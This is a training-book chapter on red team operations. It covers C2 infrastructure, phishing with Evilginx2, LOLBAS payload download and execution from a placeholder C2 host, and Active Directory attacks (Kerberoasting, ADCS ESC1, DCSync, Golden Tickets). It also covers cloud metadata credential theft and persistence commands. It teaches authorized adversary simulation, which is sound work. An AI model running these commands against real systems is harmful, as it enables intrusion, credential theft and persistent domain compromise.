Chapter 17: Red Team Operations¶
Overview¶
Red team operations represent the apex of adversarial simulation — structured, intelligence-driven campaigns that emulate real threat actors to stress-test an organization's people, processes, and technology. Unlike point-in-time penetration tests, red team engagements run for weeks or months, pursuing specific objectives (crown jewels) while evading detection. This chapter covers the full red team lifecycle, C2 infrastructure, Active Directory attack chains, cloud red teaming, purple team integration, and operational security.
Learning Objectives¶
By the end of this chapter, students SHALL be able to:
- Distinguish red team engagements from penetration tests and explain when each is appropriate
- Design covert C2 infrastructure that survives defender scrutiny
- Execute the full AD attack chain: initial access → Kerberoasting → lateral movement → DA
- Perform cloud red team operations across AWS, Azure, and GCP
- Structure purple team exercises using VECTR and Atomic Red Team
- Write executive and technical red team reports that drive remediation
Prerequisites¶
- Completion of Chapter 16 (Penetration Testing)
- Working knowledge of Active Directory architecture
- Familiarity with at least one scripting language (Python, PowerShell, or Bash)
- Understanding of TCP/IP networking and DNS
Why This Matters
In 2024, the average breach dwell time before detection was 194 days (Mandiant M-Trends). Real attackers are patient, methodical, and intelligence-driven. Red teams simulate this patience. If your blue team has never faced a multi-month adversary campaign with dedicated C2 infrastructure, they have never been truly tested. Every organization running critical infrastructure, holding sensitive data, or operating in regulated industries SHALL conduct full-scope red team operations at least annually.
17.1 Red Team vs. Penetration Test vs. Purple Team¶
The security testing landscape uses these terms loosely. Precision matters for scoping and budgeting.
| Dimension | Penetration Test | Red Team | Purple Team |
|---|---|---|---|
| Objective | Find as many vulnerabilities as possible | Test detection & response to a specific threat scenario | Co-validate detection coverage with defenders |
| Duration | Days–weeks | Weeks–months | Days (focused sprints) |
| Scope | Agreed, narrow | Broad / full enterprise | Specific TTP sets |
| Blue team aware? | Yes (white-box) or No (black-box) | No (no-notice) | Yes (collaborative) |
| Primary output | Vulnerability list + PoC | Objective attainment report + detection gaps | Detection improvement delta |
| MITRE ATT&CK usage | Technique mapping post-hoc | Emulation plan pre-engagement | Real-time TTP tracking |
| Ideal frequency | Quarterly (by asset class) | Annually or after major change | Monthly sprints |
17.1.1 The Engagement Spectrum¶
graph LR
A[Assumed Breach\nTest] --> B[Penetration Test]
B --> C[Red Team]
C --> D[Advanced Persistent\nSimulation]
D --> E[Nation-State\nEmulation]
style A fill:#2d6a4f,color:#fff
style B fill:#1d3557,color:#fff
style C fill:#e63946,color:#fff
style D fill:#780000,color:#fff
style E fill:#370617,color:#fffAssumed Breach tests start with credentials or shell access already granted — measuring lateral movement and IR response. Advanced Persistent Simulation uses a dedicated threat actor profile, custom tooling, and multi-stage infrastructure. Nation-State Emulation replicates a specific APT group (e.g., APT29/Cozy Bear) using that group's exact TTPs from MITRE ATT&CK.
17.2 Rules of Engagement and Legal Framework¶
A red team engagement without a signed, precise Rules of Engagement (RoE) document is a criminal act. The RoE SHALL define:
RULES OF ENGAGEMENT TEMPLATE
═══════════════════════════════════════════════════════
Engagement ID: RT-YYYY-NNN
Client: [Organization Legal Name]
Start/End Date: YYYY-MM-DD to YYYY-MM-DD
Authorized Scope: [IP ranges, domains, cloud accounts]
Out-of-Scope: [Third-party SaaS, production payment systems]
Prohibited Actions: Ransomware deployment, data exfiltration >10MB,
destructive commands (rm/format/wipe), DoS
Emergency Stop: Technical contacts with 24/7 phone numbers
Get-Out-of-Jail: Emergency contact letter signed by CISO
Evidence Retention: 30 days post-engagement, then secure wipe
Data Handling: All captured credentials/PII stored encrypted
Legal Jurisdiction: Governed by laws of [State/Country]
═══════════════════════════════════════════════════════
Third-Party Scope
Always verify that cloud providers, co-location facilities, and SaaS vendors are either in scope with their explicit written consent or explicitly out of scope. AWS, Azure, and GCP each have bug bounty and penetration testing policies that govern what is permissible.
17.3 Threat Intelligence-Driven Emulation Planning¶
World-class red teams do not pick TTPs randomly — they emulate the specific threat actors most likely to target the client based on industry, geography, and asset profile.
17.3.1 Emulation Planning Process¶
flowchart TD
A[Threat Intelligence\nResearch] --> B[Threat Actor\nProfile Selection]
B --> C[ATT&CK Navigator\nEmulation Layer]
C --> D[TTP Priority\nRanking]
D --> E[Tooling Selection\n& Custom Dev]
E --> F[Infrastructure\nBuild-Out]
F --> G[Engagement\nExecution]
G --> H[Detection Gap\nAnalysis]
H --> I[Purple Team\nValidation]17.3.2 MITRE ATT&CK Emulation Plans¶
MITRE publishes free Adversary Emulation Plans for APT3, APT29, FIN6, menuPass, and others. Each plan maps: - Scenario (what the actor does) - Procedure (how they do it) - Detection opportunities (what logs fire) - Tools (public vs. custom)
ATT&CK Navigator allows layering multiple actor profiles and selecting the intersection to build a realistic composite emulation.
17.4 C2 Infrastructure Design¶
Command-and-control infrastructure is the nervous system of a red team. Poorly designed C2 is fingerprinted and burned within hours. Production-grade C2 SHALL incorporate domain fronting, redirectors, and operational security measures.
17.4.1 C2 Framework Comparison¶
| Framework | License | Language | Primary Use | Beacon Protocol | Detection Difficulty |
|---|---|---|---|---|---|
| Cobalt Strike | Commercial ($5,900/seat) | Java (server) | Enterprise red teams | HTTPS/DNS/SMB | High with malleable C2 |
| Sliver | Open source | Go | Modern red teams | mTLS/WireGuard/HTTP | High (custom certs) |
| Havoc | Open source | Go/C | Academic/research | HTTPS/SMB | Medium |
| Brute Ratel C4 | Commercial | C | Targeted ops | HTTPS | Very high (EDR evasion) |
| Mythic | Open source | Python | Purple teaming | HTTP/WebSocket | Configurable |
| Empire/Starkiller | Open source | Python | PowerShell ops | HTTPS | Medium |
| Metasploit | Open source | Ruby | Pen testing | TCP/HTTPS | Low (well-sighed) |
17.4.2 Cobalt Strike Infrastructure Architecture¶
graph TB
subgraph "Operator"
OP[Operator Workstation]
TS[Team Server\n:50050]
end
subgraph "Tier 1 Redirectors"
R1[HTTPS Redirector\nApache mod_rewrite]
R2[DNS Redirector\nsocat]
R3[Domain Fronting\nCDN Edge Node]
end
subgraph "Tier 2 Long-Haul C2"
LH[Long-Haul Domain\n30-day sleep]
end
subgraph "Target Environment"
B1[Beacon — Workstation]
B2[Beacon — Server]
B3[SMB Beacon\nPeer-to-Peer]
end
OP --> TS
TS --> R1
TS --> R2
TS --> R3
R1 --> B1
R2 --> B2
R3 --> B3
B1 --> B3
LH -.->|Backup channel| B2
style OP fill:#1d3557,color:#fff
style TS fill:#1d3557,color:#fff
style R1 fill:#2d6a4f,color:#fff
style R2 fill:#2d6a4f,color:#fff
style R3 fill:#2d6a4f,color:#fff
style LH fill:#780000,color:#fff
style B1 fill:#e63946,color:#fff
style B2 fill:#e63946,color:#fff
style B3 fill:#e63946,color:#fff17.4.3 Malleable C2 Profiles¶
Malleable C2 profiles transform Cobalt Strike's network traffic to mimic legitimate applications. A profile mimicking Microsoft Teams telemetry:
set sleeptime "45000";
set jitter "15";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Teams/1.6.00.4472";
http-get {
set uri "/api/v2/telemetry/events";
client {
header "Accept" "application/json, text/plain, */*";
header "X-MS-Client-Request-Id" "a1b2c3d4-e5f6-7890-abcd-ef1234567890";
header "X-Client-Type" "desktop";
header "X-Client-Version" "1.6.00.4472";
metadata {
base64url;
parameter "correlationId";
}
}
server {
header "Content-Type" "application/json";
header "X-Content-Type-Options" "nosniff";
output {
base64url;
prepend "{\"status\":200,\"data\":\"";
append "\"}";
print;
}
}
}
17.4.4 Operational Security (OPSEC)¶
| OPSEC Requirement | Implementation |
|---|---|
| Infrastructure attribution | Register domains 60+ days before engagement via privacy-protected registrar |
| VPS attribution | Pay via cryptocurrency; use VPS in jurisdiction different from engagement |
| TLS certificates | Use Let's Encrypt with automated renewal; avoid self-signed |
| Logging | All team server logs encrypted and retained per RoE |
| Credential hygiene | Separate SSH keys per infrastructure component |
| Traffic | All redirectors use HTTPS only; HTTP → HTTPS redirect |
| Domain categorization | Categorize C2 domains as Finance/Healthcare/Tech before use |
| Kill date | Hard-coded kill date in all implants |
17.5 Initial Access¶
17.5.1 Phishing Infrastructure¶
A convincing phishing campaign requires:
- Domain — homoglyph (micros0ft.com) or typosquat (microsofft.com) categorized before launch
- Infrastructure — Evilginx2 (reverse proxy, harvests session tokens) or GoPhish (credential harvesting)
- Payload — HTML smuggling, ISO files (bypasses Mark-of-the-Web), LNK files
- Pretext — Contextually accurate lure (IT password reset, HR open enrollment, benefits renewal)
# Evilginx2 phishlet for Microsoft 365
phishlets hostname o365 login.microsoftonline.com.redteam.example.com
phishlets enable o365
lures create o365
lures get-url 0
17.5.2 Living-Off-the-Land Execution¶
LOLBAS (Living Off the Land Binaries and Scripts) — Windows:
# certutil.exe — download file (T1105)
certutil.exe -urlcache -split -f http://c2.example.com/payload.bin C:\Windows\Temp\p.bin
# mshta.exe — execute HTA payload (T1218.005)
mshta.exe http://c2.example.com/payload.hta
# regsvr32 — squiblydoo bypass (T1218.010)
regsvr32.exe /s /n /u /i:http://c2.example.com/file.sct scrobj.dll
# odbcconf — execute DLL (T1218.008)
odbcconf.exe /A {REGSVR C:\path\to\payload.dll}
17.6 Active Directory Attack Chain¶
17.6.1 AD Enumeration with BloodHound¶
BloodHound visualizes attack paths through Active Directory using graph theory.
# SharpHound collection (from Windows target)
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp\
# BloodHound CE via Docker
docker run -p 7474:7474 -p 8080:8080 specterops/bloodhound-community-edition
# BloodHound queries for high-value paths
# Find shortest path to Domain Admins
MATCH p=shortestPath((u:User)-[*1..]->(g:Group {name:"DOMAIN ADMINS@CORP.LOCAL"}))
WHERE u.enabled=true RETURN p LIMIT 10
# Find all Kerberoastable users with high-value privileges
MATCH (u:User {hasspn:true})-[:MemberOf*1..]->(g:Group)
WHERE g.highvalue=true
RETURN u.name, u.serviceprincipalnames
17.6.2 Kerberoasting¶
Kerberoasting requests service tickets for SPNs and cracks them offline. Service accounts often have weak passwords set years ago and never rotated.
# Request all TGS tickets (PowerView)
Invoke-Kerberoast -OutputFormat Hashcat | Export-Csv C:\Temp\kerb.csv
# Using Rubeus
.\Rubeus.exe kerberoast /format:hashcat /outfile:C:\Temp\hashes.txt
# Crack offline with hashcat
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt -r best64.rule
Detection: Event ID 4769 (Kerberos Service Ticket Requested) with EncryptionType = 0x17 (RC4) for accounts that are not computer accounts.
17.6.3 AS-REP Roasting¶
Targets accounts with Kerberos pre-authentication disabled.
# Impacket (from Linux)
python3 GetNPUsers.py CORP/ -usersfile users.txt -format hashcat -outputfile asrep.txt -dc-ip 10.10.10.10
# Crack
hashcat -m 18200 asrep.txt rockyou.txt
17.6.4 Active Directory Certificate Services — ESC1¶
ADCS ESC1 allows any domain user to request a certificate as a privileged account if the template: - Allows requestor to supply a Subject Alternative Name (SAN) - Enrolls Client Authentication EKU - Manager approval is not required
# Enumerate vulnerable templates (Certify)
.\Certify.exe find /vulnerable
# Request cert as Domain Admin (ESC1)
.\Certify.exe request /ca:CORP-CA\corp-DC01-CA /template:VulnerableTemplate /altname:administrator
# Convert PEM to PFX
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out admin.pfx
# Pass-the-Certificate with Rubeus
.\Rubeus.exe asktgt /user:administrator /certificate:admin.pfx /password:password /ptt
17.6.5 DCSync Attack¶
With DS-Replication-Get-Changes-All permission, an account can replicate the NTDS.dit — dumping all password hashes without touching the domain controller disk.
# Mimikatz DCSync
lsadump::dcsync /domain:corp.local /user:krbtgt
# Impacket secretsdump
python3 secretsdump.py CORP/user:password@10.10.10.10 -just-dc-ntlm
# BloodHound: find accounts with DCSync rights
MATCH (u)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain)
RETURN u.name
17.6.6 Golden Ticket¶
After obtaining the krbtgt hash via DCSync, forge Kerberos tickets valid for up to 10 years.
# Forge Golden Ticket (Mimikatz)
kerberos::golden /user:ImaginaryUser /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /id:500 /ptt
# Or with Impacket ticketer
python3 ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local administrator
export KRB5CCNAME=administrator.ccache
python3 psexec.py -k -no-pass corp.local/administrator@dc01.corp.local
17.6.7 AD Attack Chain Summary¶
flowchart LR
A[Initial Access\nPhishing/VPN Creds] --> B[Local Enum\nwhoami/net user/ipconfig]
B --> C[Domain Enum\nBloodHound/PowerView]
C --> D{Privileged\nPath?}
D -->|Kerberoastable SPN| E[Kerberoast → Crack]
D -->|ADCS ESC1| F[Certificate Abuse]
D -->|Delegation| G[Unconstrained\nDelegation Attack]
E --> H[Service Account\nCompromise]
F --> I[Impersonate DA\nwith Certificate]
G --> J[Capture TGT via\nSpoolSample/PetitPotam]
H --> K[Lateral Movement\nPass-the-Hash/Pass-the-Ticket]
I --> K
J --> K
K --> L[High-Value Target\nExchange/File Server]
L --> M[DCSync\nkrbtgt hash]
M --> N[Golden Ticket\nPersistence]
N --> O[OBJECTIVE\nCrown Jewel Access]
style O fill:#e63946,color:#fff
style M fill:#780000,color:#fff
style N fill:#780000,color:#fff17.7 Cloud Red Teaming¶
17.7.1 AWS Red Team Techniques¶
# Enumerate AWS identity
aws sts get-caller-identity
aws iam list-attached-user-policies --user-name $(aws iam get-user --query User.UserName --output text)
# Pacu — AWS exploitation framework
python3 pacu.py
Pacu> import_keys AKIAIOSFODNN7EXAMPLE
Pacu> run iam__enum_permissions
Pacu> run iam__privesc_scan
# SSRF to IMDSv1 (instance metadata)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# S3 enumeration for public buckets
aws s3 ls s3://target-bucket --no-sign-request
python3 slurp.py -t target-org -o output.txt
# Lambda privilege escalation
# If lambda:CreateFunction + iam:PassRole + lambda:InvokeFunction
aws lambda create-function \
--function-name priv-esc \
--runtime python3.11 \
--role arn:aws:iam::123456789:role/AdminRole \
--handler index.handler \
--zip-file fileb://payload.zip
17.7.2 Azure Red Team Techniques¶
# ROADtools — Azure AD enumeration
python3 roadrecon.py auth -u user@corp.onmicrosoft.com -p Password123
python3 roadrecon.py gather
python3 roadrecon.py dump
# Azure AD enumeration (AADInternals)
Import-Module AADInternals
Get-AADIntLoginInformation -UserName user@corp.onmicrosoft.com
Invoke-AADIntReconAsOutsider -DomainName corp.com
# Azure Pass-the-PRT (Primary Refresh Token)
# Extract PRT from AzureAD-joined device
Invoke-AADIntDeviceEnrollment
Get-AADIntUserPRTToken
# Service Principal abuse
az login --service-principal -u APP_ID -p PASSWORD --tenant TENANT_ID
az role assignment list --all | grep -i "Owner\|Contributor"
az keyvault secret list --vault-name target-vault
17.7.3 GCP Red Team¶
# Enumerate IAM permissions
gcloud projects get-iam-policy PROJECT_ID --flatten="bindings[].members" --format="table(bindings.role)"
# Service Account key extraction
gcloud iam service-accounts keys list --iam-account=sa@project.iam.gserviceaccount.com
# Metadata server (SSRF equivalent)
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
-H "Metadata-Flavor: Google"
# Cloud Storage public buckets
gsutil ls gs://target-bucket/ --no-auth
17.8 Lateral Movement Techniques¶
| Technique | ATT&CK ID | Tool | Detection |
|---|---|---|---|
| Pass-the-Hash | T1550.002 | Mimikatz, CrackMapExec | Event 4624 logon type 3 with NTLMv1 from unusual host |
| Pass-the-Ticket | T1550.003 | Rubeus, impacket | Event 4768/4769 from unusual IP |
| Overpass-the-Hash | T1550.002 | Mimikatz | Event 4648 explicit credential logon |
| WMI Execution | T1047 | wmic, impacket wmiexec | Event 4688 wmic.exe; WMI subscription creation |
| PSExec | T1569.002 | PsExec, impacket | Named pipe ADMIN$; service PSEXESVC created |
| SMB with valid creds | T1021.002 | smbclient, net use | Event 4624 logon type 3 |
| SSH tunneling | T1572 | ssh -D / -L | Anomalous SSH connections to internal hosts |
| DCOM | T1021.003 | impacket dcomexec | Event 4688 mmc.exe, excel.exe spawning children |
| RDP | T1021.001 | mstsc, xfreerdp | Event 4624 logon type 10 from unusual IP |
17.9 Persistence Mechanisms¶
# Scheduled task (T1053.005)
schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\payload.exe" /sc daily /st 09:00 /ru SYSTEM
# WMI event subscription (T1546.003)
$filter = Set-WmiInstance -Class __EventFilter -Namespace root/subscription \
-Arguments @{Name="WindowsUpdateFilter"; EventNamespace="root/cimv2"; \
QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}
# Registry run key (T1547.001)
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" \
-Name "WindowsDefender" -Value "C:\Windows\Temp\payload.exe"
# Golden ticket (see 17.6.6 above)
# Silver ticket — forge TGS for specific service
kerberos::golden /user:fakeuser /domain:corp.local /sid:S-1-5-21-... \
/target:fileserver.corp.local /service:cifs /rc4:SERVICE_HASH /ptt
17.10 Purple Team Operations¶
Purple team is not a separate team — it is a methodology where red and blue collaborate openly to validate detection coverage in real time.
17.10.1 Purple Team Workflow¶
sequenceDiagram
participant R as Red Team
participant P as Purple Facilitator
participant B as Blue Team/SOC
R->>P: Select TTP from ATT&CK Navigator
P->>B: Brief: "We will execute T1059.001 in 5 min"
R->>R: Execute PowerShell technique
B->>P: Report: Alert fired / No alert
P->>P: Log result in VECTR
alt No alert
P->>B: Tune detection rule together
R->>R: Re-execute technique
B->>P: Confirm detection now fires
end
P->>P: Mark TTP as validated/remediated
Note over R,B: Repeat for each TTP in emulation plan17.10.2 VECTR Tracking¶
VECTR (vectr.io) is the standard platform for tracking purple team exercise results.
# VECTR campaign structure
Campaign: APT29 Emulation Q1-2026
Assessment Groups:
- Initial Access (T1566, T1195)
- Execution (T1059.001, T1059.003)
- Persistence (T1053.005, T1547.001)
- Lateral Movement (T1550.002, T1021.001)
- Collection (T1039, T1074)
- Exfiltration (T1041, T1048)
Metrics:
- Detection Rate: 23/40 TTPs = 57.5%
- Prevention Rate: 8/40 = 20%
- Visibility Gap: 17/40 = 42.5%
17.10.3 Atomic Red Team¶
Atomic Red Team (github.com/redcanaryco/atomic-red-team) provides single-TTP test cases mapped directly to ATT&CK.
# Install Invoke-AtomicRedTeam
Install-Module -Name invoke-atomicredteam,powershell-yaml -Scope CurrentUser
Import-Module invoke-atomicredteam
# Run a specific atomic test
Invoke-AtomicTest T1059.001 -TestNumbers 1 # PowerShell execution test
Invoke-AtomicTest T1003.001 -TestNumbers 1 # LSASS memory dump
# Check prerequisites
Invoke-AtomicTest T1059.001 -CheckPrereqs
# Generate Sigma detection rule for technique
Get-AtomicTechnique -Technique T1059.001 | Select-Object -ExpandProperty atomic_tests
17.11 Reporting¶
17.11.1 Red Team Report Structure¶
EXECUTIVE SUMMARY (1–2 pages)
├── Objective and Scope
├── Simulated Threat Actor: [Name/Profile]
├── Overall Risk Rating: CRITICAL / HIGH / MEDIUM
├── Objectives Achieved: 3/4
├── Dwell Time Before Detection: 23 days
└── Top 3 Critical Findings
NARRATIVE (5–10 pages)
├── Phase 1: Initial Access
│ ├── Method: Spearphishing with ISO lure
│ ├── Date/Time: YYYY-MM-DD HH:MM
│ └── Evidence: Screenshot/log snippet
├── Phase 2: Establish Foothold
...
DETECTION ANALYSIS
├── TTPs Executed: 40
├── TTPs Detected: 9 (22.5%)
├── TTPs Prevented: 4 (10%)
├── Blind Spots: 27 (67.5%)
└── Detection Latency: Avg 4.2 hours
FINDINGS (one per crown jewel or critical path)
├── RED-001: ADCS ESC1 Allows Low-Privileged Certificate for DA
├── RED-002: DCSync Rights Granted to 4 Non-DA Accounts
└── RED-003: No Detection for Kerberoasting (47 SPNs enumerated undetected)
RECOMMENDATIONS
└── Prioritized remediation roadmap with effort/impact matrix
APPENDICES
├── A: IOC List (hashes, IPs, domains used)
├── B: ATT&CK Navigator Layer
├── C: Full Timeline
└── D: Evidence Repository Index
17.12 Benchmark Controls¶
| Control ID | Title | Red Team Relevance |
|---|---|---|
| Nexus SecOps-RT-01 | Red Team Program Establishment | Annual full-scope red team engagement |
| Nexus SecOps-RT-02 | C2 Detection Capability | Detect beaconing, DNS tunneling, domain fronting |
| Nexus SecOps-RT-03 | AD Attack Path Hardening | Kerberoasting mitigations, ADCS template audit |
| Nexus SecOps-RT-04 | Purple Team Cadence | Monthly purple team sprints with VECTR tracking |
| Nexus SecOps-RT-05 | Cloud Red Team Coverage | Cloud control plane attacks included in scope |
| Nexus SecOps-RT-06 | Initial Access Simulation | Phishing simulation ≥2/year with click-rate tracking |
Exam Prep & Certifications¶
Relevant Certifications
The topics in this chapter align with the following certifications:
- OSCP — Domains: Penetration Testing, Active Directory Attacks
- GIAC GPEN — Domains: Penetration Testing, Red Team Operations
- CompTIA PenTest+ — Domains: Attacks, Post-Exploitation, Reporting
Key Terms¶
Beacon — A lightweight implant that periodically calls back to a C2 server to receive tasking. Beacons use configurable sleep timers and jitter to evade behavioral analysis.
BloodHound — Graph-based Active Directory attack path analysis tool. Uses SharpHound collectors to ingest AD data and Neo4j to visualize relationships.
DCSync — Technique that abuses the Directory Replication Service Remote Protocol (DRSR) to request password hashes from a domain controller without logging on to it.
Domain Fronting — Technique using a CDN's infrastructure to disguise C2 traffic as legitimate requests to a trusted domain (e.g., Google, Cloudflare).
Golden Ticket — Forged Kerberos TGT signed with the krbtgt account hash, granting persistent, difficult-to-revoke Domain Admin access.
Kerberoasting — Offline cracking attack that requests service tickets for accounts with SPNs and cracks the RC4/AES-encrypted tickets.
Malleable C2 — A Cobalt Strike feature allowing the operator to fully customize the network characteristics of beacon traffic to mimic legitimate application protocols.
Purple Team — A collaborative security testing methodology where red and blue teams work together openly to validate and improve detection capabilities.
VECTR — Visualization, Execution, and Tracking for Testing and Reporting — an open-source platform for managing purple team exercise results.